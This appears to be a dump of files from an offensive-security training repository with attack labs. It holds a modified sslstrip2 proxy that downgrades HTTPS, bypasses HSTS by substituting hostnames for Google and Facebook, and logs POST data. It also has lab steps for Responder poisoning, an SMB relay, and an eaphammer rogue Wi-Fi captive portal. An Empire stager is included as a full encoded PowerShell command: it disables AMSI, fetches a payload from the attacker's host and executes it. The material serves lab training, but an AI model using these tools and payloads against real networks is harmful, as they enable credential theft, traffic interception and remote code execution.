/lab4/sslstrip2/sslstrip/CookieCleaner.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2011 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | import string 21 | 22 | class CookieCleaner: 23 | '''This class cleans cookies we haven't seen before. The basic idea is to 24 | kill sessions, which isn't entirely straight-forward. Since we want this to 25 | be generalized, there's no way for us to know exactly what cookie we're trying 26 | to kill, which also means we don't know what domain or path it has been set for. 27 | 28 | The rule with cookies is that specific overrides general. So cookies that are 29 | set for mail.foo.com override cookies with the same name that are set for .foo.com, 30 | just as cookies that are set for foo.com/mail override cookies with the same name 31 | that are set for foo.com/ 32 | 33 | The best we can do is guess, so we just try to cover our bases by expiring cookies 34 | in a few different ways. The most obvious thing to do is look for individual cookies 35 | and nail the ones we haven't seen coming from the server, but the problem is that cookies are often 36 | set by Javascript instead of a Set-Cookie header, and if we block those the site 37 | will think cookies are disabled in the browser. So we do the expirations and whitlisting 38 | based on client,server tuples. The first time a client hits a server, we kill whatever 39 | cookies we see then. After that, we just let them through. Not perfect, but pretty effective. 40 | 41 | ''' 42 | 43 | _instance = None 44 | 45 | def getInstance(): 46 | if CookieCleaner._instance == None: 47 | CookieCleaner._instance = CookieCleaner() 48 | 49 | return CookieCleaner._instance 50 | 51 | getInstance = staticmethod(getInstance) 52 | 53 | def __init__(self): 54 | self.cleanedCookies = set(); 55 | self.enabled = False 56 | 57 | def setEnabled(self, enabled): 58 | self.enabled = enabled 59 | 60 | def isClean(self, method, client, host, headers): 61 | if method == "POST": return True 62 | if not self.enabled: return True 63 | if not self.hasCookies(headers): return True 64 | 65 | return (client, self.getDomainFor(host)) in self.cleanedCookies 66 | 67 | def getExpireHeaders(self, method, client, host, headers, path): 68 | domain = self.getDomainFor(host) 69 | self.cleanedCookies.add((client, domain)) 70 | 71 | expireHeaders = [] 72 | 73 | for cookie in headers['cookie'].split(";"): 74 | cookie = cookie.split("=")[0].strip() 75 | expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) 76 | expireHeaders.extend(expireHeadersForCookie) 77 | 78 | return expireHeaders 79 | 80 | def hasCookies(self, headers): 81 | return 'cookie' in headers 82 | 83 | def getDomainFor(self, host): 84 | hostParts = host.split(".") 85 | return "." + hostParts[-2] + "." + hostParts[-1] 86 | 87 | def getExpireCookieStringFor(self, cookie, host, domain, path): 88 | pathList = path.split("/") 89 | expireStrings = list() 90 | 91 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + 92 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 93 | 94 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + 95 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 96 | 97 | if len(pathList) > 2: 98 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 99 | domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 100 | 101 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 102 | host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 103 | 104 | return expireStrings 105 | 106 | 107 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/DnsCache.py: -------------------------------------------------------------------------------- 1 | 2 | class DnsCache: 3 | 4 | ''' 5 | The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. 6 | ''' 7 | 8 | _instance = None 9 | 10 | def __init__(self): 11 | self.cache = {} 12 | 13 | def cacheResolution(self, host, address): 14 | self.cache[host] = address 15 | 16 | def getCachedAddress(self, host): 17 | if host in self.cache: 18 | return self.cache[host] 19 | 20 | return None 21 | 22 | def getInstance(): 23 | if DnsCache._instance == None: 24 | DnsCache._instance = DnsCache() 25 | 26 | return DnsCache._instance 27 | 28 | getInstance = staticmethod(getInstance) 29 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/SSLServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string 20 | 21 | from ServerConnection import ServerConnection 22 | 23 | class SSLServerConnection(ServerConnection): 24 | 25 | ''' 26 | For SSL connections to a server, we need to do some additional stripping. First we need 27 | to make note of any relative links, as the server will be expecting those to be requested 28 | via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. 29 | ''' 30 | 31 | cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) 32 | cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) 33 | iconExpression = re.compile(r"", re.IGNORECASE) 34 | linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) 35 | headExpression = re.compile(r"", re.IGNORECASE) 36 | 37 | def __init__(self, command, uri, postData, headers, client): 38 | ServerConnection.__init__(self, command, uri, postData, headers, client) 39 | 40 | def getLogLevel(self): 41 | return logging.INFO 42 | 43 | def getPostPrefix(self): 44 | return "SECURE POST" 45 | 46 | def handleHeader(self, key, value): 47 | if (key.lower() == 'set-cookie'): 48 | newvalues =[] 49 | value = SSLServerConnection.cookieExpression.sub("\g<1>", value) 50 | values = value.split(';') 51 | for v in values: 52 | if v[:7].lower()==' domain': 53 | dominio=v.split("=")[1] 54 | logging.debug("LEO Parsing cookie domain parameter: %s"%v) 55 | real = self.urlMonitor.sustitucion 56 | if dominio in real: 57 | v=" Domain=%s"%real[dominio] 58 | logging.debug("LEO New cookie domain parameter: %s"%v) 59 | newvalues.append(v) 60 | value = ';'.join(newvalues) 61 | 62 | if (key.lower() == 'access-control-allow-origin'): 63 | value='*' 64 | 65 | ServerConnection.handleHeader(self, key, value) 66 | 67 | def stripFileFromPath(self, path): 68 | (strippedPath, lastSlash, file) = path.rpartition('/') 69 | return strippedPath 70 | 71 | def buildAbsoluteLink(self, link): 72 | absoluteLink = "" 73 | 74 | if ((not link.startswith('http')) and (not link.startswith('/'))): 75 | absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link 76 | 77 | logging.debug("Found path-relative link in secure transmission: " + link) 78 | logging.debug("New Absolute path-relative link: " + absoluteLink) 79 | elif not link.startswith('http'): 80 | absoluteLink = "http://"+self.headers['host']+link 81 | 82 | logging.debug("Found relative link in secure transmission: " + link) 83 | logging.debug("New Absolute link: " + absoluteLink) 84 | 85 | if not absoluteLink == "": 86 | absoluteLink = absoluteLink.replace('&', '&') 87 | self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); 88 | 89 | def replaceCssLinks(self, data): 90 | iterator = re.finditer(SSLServerConnection.cssExpression, data) 91 | 92 | for match in iterator: 93 | self.buildAbsoluteLink(match.group(1)) 94 | 95 | return data 96 | 97 | def replaceFavicon(self, data): 98 | match = re.search(SSLServerConnection.iconExpression, data) 99 | 100 | if (match != None): 101 | data = re.sub(SSLServerConnection.iconExpression, 102 | "", data) 103 | else: 104 | data = re.sub(SSLServerConnection.headExpression, 105 | "", data) 106 | 107 | return data 108 | 109 | def replaceSecureLinks(self, data): 110 | data = ServerConnection.replaceSecureLinks(self, data) 111 | data = self.replaceCssLinks(data) 112 | 113 | if (self.urlMonitor.isFaviconSpoofing()): 114 | data = self.replaceFavicon(data) 115 | 116 | iterator = re.finditer(SSLServerConnection.linkExpression, data) 117 | 118 | for match in iterator: 119 | self.buildAbsoluteLink(match.group(10)) 120 | 121 | return data 122 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/ServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string, random, zlib, gzip, StringIO 20 | 21 | from twisted.web.http import HTTPClient 22 | from URLMonitor import URLMonitor 23 | 24 | class ServerConnection(HTTPClient): 25 | 26 | ''' The server connection is where we do the bulk of the stripping. Everything that 27 | comes back is examined. The headers we dont like are removed, and the links are stripped 28 | from HTTPS to HTTP. 29 | ''' 30 | 31 | urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) 32 | urlType = re.compile(r"https://", re.IGNORECASE) 33 | urlTypewww = re.compile(r"https://www", re.IGNORECASE) 34 | urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) 35 | urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) 36 | urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE) 37 | urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE) 38 | # urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE) 39 | 40 | def __init__(self, command, uri, postData, headers, client): 41 | self.command = command 42 | self.uri = uri 43 | self.postData = postData 44 | self.headers = headers 45 | self.client = client 46 | self.urlMonitor = URLMonitor.getInstance() 47 | self.isImageRequest = False 48 | self.isCompressed = False 49 | self.contentLength = None 50 | self.shutdownComplete = False 51 | 52 | def getLogLevel(self): 53 | return logging.DEBUG 54 | 55 | def getPostPrefix(self): 56 | return "POST" 57 | 58 | def sendRequest(self): 59 | logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri)) 60 | self.sendCommand(self.command, self.uri) 61 | 62 | def sendHeaders(self): 63 | for header, value in self.headers.items(): 64 | logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value)) 65 | self.sendHeader(header, value) 66 | 67 | self.endHeaders() 68 | 69 | def sendPostData(self): 70 | logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData)) 71 | self.transport.write(self.postData) 72 | 73 | def connectionMade(self): 74 | logging.log(self.getLogLevel(), "HTTP connection made.") 75 | self.sendRequest() 76 | self.sendHeaders() 77 | 78 | if (self.command == 'POST'): 79 | self.sendPostData() 80 | 81 | def handleStatus(self, version, code, message): 82 | logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message)) 83 | self.client.setResponseCode(int(code), message) 84 | 85 | def handleHeader(self, key, value): 86 | logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value)) 87 | 88 | if (key.lower() == 'location'): 89 | value = self.replaceSecureLinks(value) 90 | 91 | if (key.lower() == 'content-type'): 92 | if (value.find('image') != -1): 93 | self.isImageRequest = True 94 | logging.debug("Response is image content, not scanning...") 95 | 96 | if (key.lower() == 'content-encoding'): 97 | if (value.find('gzip') != -1): 98 | logging.debug("Response is compressed...") 99 | self.isCompressed = True 100 | elif (key.lower() == 'content-length'): 101 | self.contentLength = value 102 | elif (key.lower() == 'set-cookie'): 103 | self.client.responseHeaders.addRawHeader(key, value) 104 | elif (key.lower()== 'strict-transport-security'): 105 | logging.log(self.getLogLevel(), "LEO Erasing Strict Transport Security....") 106 | else: 107 | self.client.setHeader(key, value) 108 | 109 | 110 | def handleEndHeaders(self): 111 | if (self.isImageRequest and self.contentLength != None): 112 | self.client.setHeader("Content-Length", self.contentLength) 113 | 114 | if self.length == 0: 115 | self.shutdown() 116 | 117 | def handleResponsePart(self, data): 118 | if (self.isImageRequest): 119 | self.client.write(data) 120 | else: 121 | HTTPClient.handleResponsePart(self, data) 122 | 123 | def handleResponseEnd(self): 124 | if (self.isImageRequest): 125 | self.shutdown() 126 | else: 127 | HTTPClient.handleResponseEnd(self) 128 | 129 | def handleResponse(self, data): 130 | if (self.isCompressed): 131 | logging.debug("Decompressing content...") 132 | data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() 133 | 134 | logging.log(self.getLogLevel(), "Read from server:\n" + data) 135 | #logging.log(self.getLogLevel(), "Read from server:\n " ) 136 | 137 | 138 | data = self.replaceSecureLinks(data) 139 | 140 | if (self.contentLength != None): 141 | self.client.setHeader('Content-Length', len(data)) 142 | 143 | self.client.write(data) 144 | self.shutdown() 145 | 146 | def replaceSecureLinks(self, data): 147 | sustitucion = {} 148 | patchDict = self.urlMonitor.patchDict 149 | if len(patchDict)>0: 150 | dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) 151 | data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data) 152 | 153 | iterator = re.finditer(ServerConnection.urlExpression, data) 154 | for match in iterator: 155 | url = match.group() 156 | 157 | logging.debug("Found secure reference: " + url) 158 | nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url) 159 | logging.debug("LEO replacing %s => %s"%(url,nuevaurl)) 160 | sustitucion[url] = nuevaurl 161 | #data.replace(url,nuevaurl) 162 | 163 | #data = self.urlMonitor.DataReemplazo(data) 164 | if len(sustitucion)>0: 165 | dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys()))) 166 | data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data) 167 | 168 | #logging.debug("LEO DEBUG received data:\n"+data) 169 | #data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data) 170 | #data = re.sub(ServerConnection.urlTypewww, 'http://w', data) 171 | #if data.find("http://w.face")!=-1: 172 | # logging.debug("LEO DEBUG Found error in modifications") 173 | # raw_input("Press Enter to continue") 174 | #return re.sub(ServerConnection.urlType, 'http://web.', data) 175 | return data 176 | 177 | 178 | def shutdown(self): 179 | if not self.shutdownComplete: 180 | self.shutdownComplete = True 181 | self.client.finish() 182 | self.transport.loseConnection() 183 | 184 | 185 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/ServerConnectionFactory.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | from twisted.internet.protocol import ClientFactory 21 | 22 | class ServerConnectionFactory(ClientFactory): 23 | 24 | def __init__(self, command, uri, postData, headers, client): 25 | self.command = command 26 | self.uri = uri 27 | self.postData = postData 28 | self.headers = headers 29 | self.client = client 30 | 31 | def buildProtocol(self, addr): 32 | return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) 33 | 34 | def clientConnectionFailed(self, connector, reason): 35 | logging.debug("Server connection failed.") 36 | 37 | destination = connector.getDestination() 38 | 39 | if (destination.port != 443): 40 | logging.debug("Retrying via SSL") 41 | self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) 42 | else: 43 | self.client.finish() 44 | 45 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/StrippingProxy.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | from twisted.web.http import HTTPChannel 20 | from ClientRequest import ClientRequest 21 | 22 | class StrippingProxy(HTTPChannel): 23 | '''sslstrip is, at heart, a transparent proxy server that does some unusual things. 24 | This is the basic proxy server class, where we get callbacks for GET and POST methods. 25 | We then proxy these out using HTTP or HTTPS depending on what information we have about 26 | the (connection, client_address) tuple in our cache. 27 | ''' 28 | 29 | requestFactory = ClientRequest 30 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/URLMonitor.py: -------------------------------------------------------------------------------- 1 | # URLMonitor 2 | 3 | import re 4 | import logging 5 | 6 | class URLMonitor: 7 | 8 | ''' 9 | The URL monitor maintains a set of (client, url) tuples that correspond to requests which the 10 | server is expecting over SSL. It also keeps track of secure favicon urls. 11 | ''' 12 | 13 | # Start the arms race, and end up here... 14 | javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] 15 | _instance = None 16 | sustitucion = {} # LEO: diccionario host / sustitucion 17 | real = {} # LEO: diccionario host / real 18 | patchDict = { 19 | 'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net', 20 | 'https:\/\/www.facebook.com':'http:\/\/wwww.facebook.com', 21 | 'return"https:"':'return"http:"' 22 | } 23 | 24 | def __init__(self): 25 | self.strippedURLs = set() 26 | self.strippedURLPorts = {} 27 | self.faviconReplacement = False 28 | self.sustitucion["mail.google.com"] = "gmail.google.com" 29 | self.real["gmail.google.com"] = "mail.google.com" 30 | 31 | self.sustitucion["www.facebook.com"] = "social.facebook.com" 32 | self.real["social.facebook.com"] = "www.facebook.com" 33 | 34 | self.sustitucion["accounts.google.com"] = "cuentas.google.com" 35 | self.real["cuentas.google.com"] = "accounts.google.com" 36 | 37 | self.sustitucion["accounts.google.es"] = "cuentas.google.es" 38 | self.real["cuentas.google.es"] = "accounts.google.es" 39 | 40 | 41 | def isSecureLink(self, client, url): 42 | for expression in URLMonitor.javascriptTrickery: 43 | if (re.match(expression, url)): 44 | logging.debug("JavaScript trickery!") 45 | return True 46 | 47 | if (client, url) in self.strippedURLs: 48 | logging.debug("(%s, %s) in strippedURLs" % (client, url)) 49 | return (client,url) in self.strippedURLs 50 | 51 | def getSecurePort(self, client, url): 52 | if (client,url) in self.strippedURLs: 53 | return self.strippedURLPorts[(client,url)] 54 | else: 55 | return 443 56 | 57 | def addSecureLink(self, client, url): 58 | methodIndex = url.find("//") + 2 59 | method = url[0:methodIndex] 60 | pathIndex = url.find("/", methodIndex) 61 | 62 | if pathIndex is -1: 63 | pathIndex = len(url) 64 | url += "/" 65 | 66 | host = url[methodIndex:pathIndex].lower() 67 | path = url[pathIndex:] 68 | 69 | port = 443 70 | portIndex = host.find(":") 71 | 72 | if (portIndex != -1): 73 | host = host[0:portIndex] 74 | port = host[portIndex+1:] 75 | if len(port) == 0: 76 | port = 443 77 | 78 | #LEO: Sustituir HOST 79 | if not self.sustitucion.has_key(host): 80 | lhost = host[:4] 81 | if lhost=="www.": 82 | self.sustitucion[host] = "w"+host 83 | self.real["w"+host] = host 84 | else: 85 | self.sustitucion[host] = "web"+host 86 | self.real["web"+host] = host 87 | logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) 88 | 89 | url = 'http://' + host + path 90 | #logging.debug("LEO stripped URL: %s %s"%(client, url)) 91 | 92 | self.strippedURLs.add((client, url)) 93 | self.strippedURLPorts[(client, url)] = int(port) 94 | return 'http://'+self.sustitucion[host]+path 95 | 96 | def setFaviconSpoofing(self, faviconSpoofing): 97 | self.faviconSpoofing = faviconSpoofing 98 | 99 | def isFaviconSpoofing(self): 100 | return self.faviconSpoofing 101 | 102 | def isSecureFavicon(self, client, url): 103 | return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) 104 | 105 | def URLgetRealHost(self,host): 106 | logging.debug("Parsing host: %s"%host) 107 | if self.real.has_key(host): 108 | logging.debug("New host: %s"%self.real[host]) 109 | return self.real[host] 110 | else: 111 | logging.debug("New host: %s"%host) 112 | return host 113 | 114 | def getInstance(): 115 | if URLMonitor._instance == None: 116 | URLMonitor._instance = URLMonitor() 117 | 118 | return URLMonitor._instance 119 | 120 | getInstance = staticmethod(getInstance) 121 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/sslstrip2/sslstrip/__init__.py -------------------------------------------------------------------------------- /lab5/instructions.txt: -------------------------------------------------------------------------------- 1 | 1. Start responder: 2 | 3 | responder -I eth0 -wr 4 | 5 | 2. Attempt to access nonexistent SMB share in Windows AD Victim 1 machine 6 | -------------------------------------------------------------------------------- /lab6/instructions.txt: -------------------------------------------------------------------------------- 1 | In your Kali VM: 2 | 3 | 1. Start Empire 4 | 5 | ./empire 6 | 7 | 2. In Empire, enter "listeners" submenu 8 | 9 | (Empire) > listeners 10 | 11 | 3. In "listeners" submenu, enter the following command: 12 | 13 | (Empire: listeners) > uselistener http 14 | 15 | 4. Enter "info" to see a list of options 16 | 17 | (Empire: listeners/http) > info 18 | 19 | 5. Set name to awae1 20 | 21 | (Empire: listeners/http) > set Name awae1 22 | 23 | 6. In another terminal, use ifconfig eth0 to obtain your IP address 24 | 25 | (Empire: listeners/http) > ifconfig eth0 26 | 27 | 7. set "Host" to http://:4444 28 | 29 | (Empire: listeners/http) > set Host http://10.10.10.102:4444 30 | 31 | 8. Start the listener 32 | 33 | (Empire: listeners/http) > execute 34 | 35 | 9. Enter "back" to return to the "listeners" submenu 36 | 37 | (Empire: listeners/http) > back 38 | 39 | 9. Enter "back" to return to the main menu 40 | 41 | (Empire: listeners) > back 42 | 43 | 10. Select a launcher stager 44 | 45 | (Empire) > usestager multi/launcher 46 | 47 | 11. Use the "info" command to see a list of options 48 | 49 | (Empire: stager/multi/launcher) > info 50 | 51 | 12. Select the listener we created earlier 52 | 53 | (Empire: stager/multi/launcher) > use Listener awae1 54 | 55 | 13. Display the listener on the screen 56 | 57 | (Empire: stager/multi/launcher) > execute 58 | 59 | 60 | 14. Set output to environment variable: 61 | 62 | 63 | cmd='powershell -noP -sta -w 1 -enc WwBSAEUARgBdAC4AQQBzAFMARQBNAGIAbABZAC4ARwBlAHQAVAB5AFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAVABGAEkAZQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQBUAFYAYQBsAFUARQAoACQATgB1AGwAbAAsACQAdAByAHUARQApAH0AOwBbAFMAWQBTAHQARQBtAC4ATgBFAFQALgBTAGUAUgBWAGkAQwBlAFAAbwBJAG4AdABNAEEAbgBBAEcARQByAF0AOgA6AEUAWABQAEUAQwB0ADEAMAAwAEMATwBOAFQASQBOAFUARQA9ADAAOwAkAFcAQwA9AE4AZQB3AC0ATwBCAEoARQBjAHQAIABTAFkAUwBUAEUAbQAuAE4ARQB0AC4AVwBFAGIAQwBsAEkAZQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AGMALgBIAGUAYQBEAEUAUgBzAC4AQQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAEMALgBQAFIAbwBYAHkAPQBbAFMAeQBTAFQARQBtAC4ATgBlAHQALgBXAEUAYgBSAGUAUQBVAGUAUwB0AF0AOgA6AEQAZQBGAEEAdQBsAFQAVwBFAGIAUABSAE8AWAB5ADsAJABXAEMALgBQAHIAbwBYAFkALgBDAHIAZQBkAEUAbgBUAGkAYQBsAHMAIAA9ACAAWwBTAHkAcwBUAGUATQAuAE4AZQB0AC4AQwByAGUARABlAG4AVABpAEEATABDAEEAYwBoAGUAXQA6ADoARABlAEYAYQB1AGwAdABOAGUAVAB3AE8AUgBLAEMAUgBlAGQAZQBuAHQAaQBhAGwAUwA7ACQASwA9AFsAUwB5AHMAVABlAG0ALgBUAEUAeABUAC4ARQBuAGMATwBEAGkAbgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQBUAEUAcwAoACcARgBzAEsAPwBDAEoAOABQAF0AYQBmAGMALwAyAFcAfABlAFoAJgBVAE4AeQA3AFEARABMAHsAMQBFAHoAWwBHACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAEEAZABlAHIAcwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AQwB5AEEAeQBZAFcAUwBwAEQAKwB2AC8AWQBaADIAVQBXAEYATwBMAEcAZwBoADEANQBrAFkAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEAMAAuADEAMAAyADoANAA0ADQANAAnADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJABkAEEAVABBAD0AJABXAEMALgBEAE8AVwBOAEwAbwBBAEQARABBAHQAYQAoACQAUwBlAFIAKwAkAFQAKQA7ACQASQB2AD0AJABkAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAG4AZwBUAGgAXQA7AC0ASgBPAGkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=' 64 | 65 | 15. Start SMB Relay server, targeting Windows AD Victim 2. The -h flag is used to specify the 66 | target's IP address. The -c flag is used to specify a command to run on the target machine. 67 | 68 | python smbrelayx.py -h -c $cmd 69 | 70 | 16. Log into Windows AD Victim 1 as EXAMPLE\Administrator 71 | 72 | 17. Attempt to access the SMB Share \\trololololo\lololollololol 73 | 74 | 18. Wait for reverse connection from Kali VM. 75 | -------------------------------------------------------------------------------- /lab7/instructions.txt: -------------------------------------------------------------------------------- 1 | Create a captive portal using eaphammer with the following flags: 2 | 3 | bssid=`ifconfig eth0 | grep ether | awk '{ print $2 }'` 4 | 5 | ./eaphammer -i wlan0 --bssid $bssid --essid FREE_WIFI --captive-portal 6 | --------------------------------------------------------------------------------